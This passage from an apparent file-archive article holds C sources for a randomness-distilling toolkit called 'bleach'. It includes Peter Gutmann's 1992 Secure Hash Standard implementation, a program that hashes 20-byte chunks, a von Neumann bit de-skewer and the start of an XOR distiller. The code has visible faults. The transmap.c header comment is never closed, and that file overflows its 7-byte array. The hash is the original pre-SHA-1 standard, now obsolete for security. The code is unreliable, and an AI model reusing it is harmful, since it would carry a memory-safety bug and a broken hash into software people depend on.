* Comments to pgut1@cs.aukuni.ac.nz
*/
#include <string.h>
#include "shs.h"
/* The SHS f()-functions */
#define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */
#define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */
#define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */
#define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */
/* The SHS Mysterious Constants */
#define K1 0x5A827999L /* Rounds 0-19 */
#define K2 0x6ED9EBA1L /* Rounds 20-39 */
#define K3 0x8F1BBCDCL /* Rounds 40-59 */
#define K4 0xCA62C1D6L /* Rounds 60-79 */
/* SHS initial values */
#define h0init 0x67452301L
#define h1init 0xEFCDAB89L
#define h2init 0x98BADCFEL
#define h3init 0x10325476L
#define h4init 0xC3D2E1F0L
/* 32-bit rotate - kludged with shifts */
#define S(n,X) ((X << n) | (X >> (32 - n)))
/* The initial expanding function */
#define expand(count) W [count] = W [count - 3] ^ W [count - 8] ^ W [count - 14] ^ W [count - 16]
/* The four SHS sub-rounds */
#define subRound1(count) \
{ \
temp = S (5, A) + f1 (B, C, D) + E + W [count] + K1; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound2(count) \
{ \
temp = S (5, A) + f2 (B, C, D) + E + W [count] + K2; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound3(count) \
{ \
temp = S (5, A) + f3 (B, C, D) + E + W [count] + K3; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound4(count) \
{ \
temp = S (5, A) + f4 (B, C, D) + E + W [count] + K4; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
/* The two buffers of 5 32-bit words */
LONG h0, h1, h2, h3, h4;
LONG A, B, C, D, E;
local void byteReverse OF((LONG *buffer, int byteCount));
void shsTransform OF((SHS_INFO *shsInfo));
/* Initialize the SHS values */
void shsInit (shsInfo)
SHS_INFO *shsInfo;
{
/* Set the h-vars to their initial values */
shsInfo->digest [0] = h0init;
shsInfo->digest [1] = h1init;
shsInfo->digest [2] = h2init;
shsInfo->digest [3] = h3init;
shsInfo->digest [4] = h4init;
/* Initialise bit count */
shsInfo->countLo = shsInfo->countHi = 0L;
}
/*
* Perform the SHS transformation. Note that this code, like MD5, seems to
* break some optimizing compilers - it may be necessary to split it into
* sections, eg based on the four subrounds
*/
void shsTransform (shsInfo)
SHS_INFO *shsInfo;
{
LONG W [80], temp;
int i;
/* Step A. Copy the data buffer into the local work buffer */
for (i = 0; i < 16; i++)
W [i] = shsInfo->data [i];
/* Step B. Expand the 16 words into 64 temporary data words */
expand (16); expand (17); expand (18); expand (19); expand (20);
expand (21); expand (22); expand (23); expand (24); expand (25);
expand (26); expand (27); expand (28); expand (29); expand (30);
expand (31); expand (32); expand (33); expand (34); expand (35);
expand (36); expand (37); expand (38); expand (39); expand (40);
expand (41); expand (42); expand (43); expand (44); expand (45);
expand (46); expand (47); expand (48); expand (49); expand (50);
expand (51); expand (52); expand (53); expand (54); expand (55);
expand (56); expand (57); expand (58); expand (59); expand (60);
expand (61); expand (62); expand (63); expand (64); expand (65);
expand (66); expand (67); expand (68); expand (69); expand (70);
expand (71); expand (72); expand (73); expand (74); expand (75);
expand (76); expand (77); expand (78); expand (79);
/* Step C. Set up first buffer */
A = shsInfo->digest [0];
B = shsInfo->digest [1];
C = shsInfo->digest [2];
D = shsInfo->digest [3];
E = shsInfo->digest [4];
/* Step D. Serious mangling, divided into four sub-rounds */
subRound1 (0); subRound1 (1); subRound1 (2); subRound1 (3);
subRound1 (4); subRound1 (5); subRound1 (6); subRound1 (7);
subRound1 (8); subRound1 (9); subRound1 (10); subRound1 (11);
subRound1 (12); subRound1 (13); subRound1 (14); subRound1 (15);
subRound1 (16); subRound1 (17); subRound1 (18); subRound1 (19);
subRound2 (20); subRound2 (21); subRound2 (22); subRound2 (23);
subRound2 (24); subRound2 (25); subRound2 (26); subRound2 (27);
subRound2 (28); subRound2 (29); subRound2 (30); subRound2 (31);
subRound2 (32); subRound2 (33); subRound2 (34); subRound2 (35);
subRound2 (36); subRound2 (37); subRound2 (38); subRound2 (39);
subRound3 (40); subRound3 (41); subRound3 (42); subRound3 (43);
subRound3 (44); subRound3 (45); subRound3 (46); subRound3 (47);
subRound3 (48); subRound3 (49); subRound3 (50); subRound3 (51);
subRound3 (52); subRound3 (53); subRound3 (54); subRound3 (55);
subRound3 (56); subRound3 (57); subRound3 (58); subRound3 (59);
subRound4 (60); subRound4 (61); subRound4 (62); subRound4 (63);
subRound4 (64); subRound4 (65); subRound4 (66); subRound4 (67);
subRound4 (68); subRound4 (69); subRound4 (70); subRound4 (71);
subRound4 (72); subRound4 (73); subRound4 (74); subRound4 (75);
subRound4 (76); subRound4 (77); subRound4 (78); subRound4 (79);
/* Step E. Build message digest */
shsInfo->digest [0] += A;
shsInfo->digest [1] += B;
shsInfo->digest [2] += C;
shsInfo->digest [3] += D;
shsInfo->digest [4] += E;
}
local void byteReverse (buffer, byteCount)
LONG *buffer;
int byteCount;
{
LONG value;
int count;
/*
* Find out what the byte order is on this machine.
* Big endian is for machines that place the most significant byte
* first (eg. Sun SPARC). Little endian is for machines that place
* the least significant byte first (eg. VAX).
*
* We figure out the byte order by stuffing a 2 byte string into a
* short and examining the left byte. '@' = 0x40 and 'P' = 0x50
* If the left byte is the 'high' byte, then it is 'big endian'.
* If the left byte is the 'low' byte, then the machine is 'little
* endian'.
*
* -- Shawn A. Clifford (sac@eng.ufl.edu)
*/
/*
* Several bugs fixed -- Pat Myrto (pat@rwing.uucp)
*/
if ((*(unsigned short *) ("@P") >> 8) == '@')
return;
byteCount /= sizeof (LONG);
for (count = 0; count < byteCount; count++) {
value = (buffer [count] << 16) | (buffer [count] >> 16);
buffer [count] = ((value & 0xFF00FF00L) >> 8) | ((value & 0x00FF00FFL) << 8);
}
}
/*
* Update SHS for a block of data. This code assumes that the buffer size is
* a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more
* efficient since it does away with the need to handle partial blocks
* between calls to shsUpdate()
*/
void shsUpdate (shsInfo, buffer, count)
SHS_INFO *shsInfo;
BYTE *buffer;
int count;
{
/* Update bitcount */
if ((shsInfo->countLo + ((LONG) count << 3)) < shsInfo->countLo)
shsInfo->countHi++; /* Carry from low to high bitCount */
shsInfo->countLo += ((LONG) count << 3);
shsInfo->countHi += ((LONG) count >> 29);
/* Process data in SHS_BLOCKSIZE chunks */
while (count >= SHS_BLOCKSIZE) {
memcpy (shsInfo->data, buffer, SHS_BLOCKSIZE);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
shsTransform (shsInfo);
buffer += SHS_BLOCKSIZE;
count -= SHS_BLOCKSIZE;
}
/*
* Handle any remaining bytes of data.
* This should only happen once on the final lot of data
*/
memcpy (shsInfo->data, buffer, count);
}
void shsFinal (shsInfo)
SHS_INFO *shsInfo;
{
int count;
LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi;
/* Compute number of bytes mod 64 */
count = (int) ((shsInfo->countLo >> 3) & 0x3F);
/*
* Set the first char of padding to 0x80.
* This is safe since there is always at least one byte free
*/
((BYTE *) shsInfo->data) [count++] = 0x80;
/* Pad out to 56 mod 64 */
if (count > 56) {
/* Two lots of padding: Pad the first block to 64 bytes */
memset ((BYTE *) shsInfo->data + count, 0, 64 - count);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
shsTransform (shsInfo);
/* Now fill the next block with 56 bytes */
memset (shsInfo->data, 0, 56);
} else
/* Pad block to 56 bytes */
memset ((BYTE *) shsInfo->data + count, 0, 56 - count);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
/* Append length in bits and transform */
shsInfo->data [14] = highBitcount;
shsInfo->data [15] = lowBitcount;
shsTransform (shsInfo);
byteReverse (shsInfo->data, SHS_DIGESTSIZE);
}
<-->
<++> bleach/sha/shs.h
/* --------------------------------- SHS.H ------------------------------- */
/*
* NIST proposed Secure Hash Standard.
*
* Written 2 September 1992, Peter C. Gutmann.
* This implementation placed in the public domain.
*
* Comments to pgut1@cs.aukuni.ac.nz
*/
/* Useful defines/typedefs */
#ifndef SHS_H
#define SHS_H
typedef unsigned char BYTE;
typedef unsigned long LONG;
/* The SHS block size and message digest sizes, in bytes */
#define SHS_BLOCKSIZE 64
#define SHS_DIGESTSIZE 20
/* The structure for storing SHS info */
typedef struct {
LONG digest [5]; /* Message digest */
LONG countLo, countHi; /* 64-bit bit count */
LONG data [16]; /* SHS data buffer */
} SHS_INFO;
/* Turn off prototypes if requested */
#if (defined(NOPROTO) && defined(PROTO))
# undef PROTO
#endif
/* Used to remove arguments in function prototypes for non-ANSI C */
#ifdef PROTO
# define OF(a) a
#else /* !PROTO */
# define OF(a) ()
#endif /* ?PROTO */
#define local static
void shsInit OF((SHS_INFO *shsInfo));
void shsUpdate OF((SHS_INFO *shsInfo, BYTE *buffer, int count));
void shsFinal OF((SHS_INFO *shsInfo));
#endif
<-->
<++> bleach/sha_distill.c
#include <stdio.h>
#include "sha/shs.h"
main ()
{
SHS_INFO shsInfo;
unsigned char c[20];
while (fread(c, 1,20,stdin) == 20)
{
shsInit(&shsInfo);
shsUpdate(&shsInfo,c,20);
shsFinal(&shsInfo);
fwrite(&shsInfo,1,20,stdout);
}
}
<-->
<++> bleach/transmap.c
/*
Implementation of von Neumann's transistion mapping scheme to de-skew
a series of random bits. See 5.2.2 of RFC1750 for more information.
/
#include <stdio.h>
char reconstruct_byte(char *byte_ary);
main ()
{
char c, b1, b2, i, j;
char byte[7];
j=0;
while ( !feof(stdin) )
{
fread(&c, 1,1,stdin);
for (i=7; i>=0; i-=2)
{
b1=((c>>i)&1); /* integer representation of bit i */
b2=((c>>(i-1))&1);
if ( (b1==1) && (b2==0) ) /* translation of 10 */
{
byte[j]=1;
j++;
}
if ( (b1==0) && (b2==1) ) /* translation of 01 */
{
byte[j]=0;
j++;
}
}
if (j>7)
{
putc(reconstruct_byte(byte),stdout);
j=0;
}
}
}
char reconstruct_byte(char *byte_ary)
{
char i;
char r = 0;
for (i=0; i<=7; i++)
{
r<<=1;
r|=byte_ary[i];
}
return r;
}
<-->
<++> bleach/xor_distill.c
/* Distills entropy from a stream of skewed random bits by XORing
each bit in a byte against each other to obtain 1 output bit per
input byte. 8 such bits are reconstructed into a byte.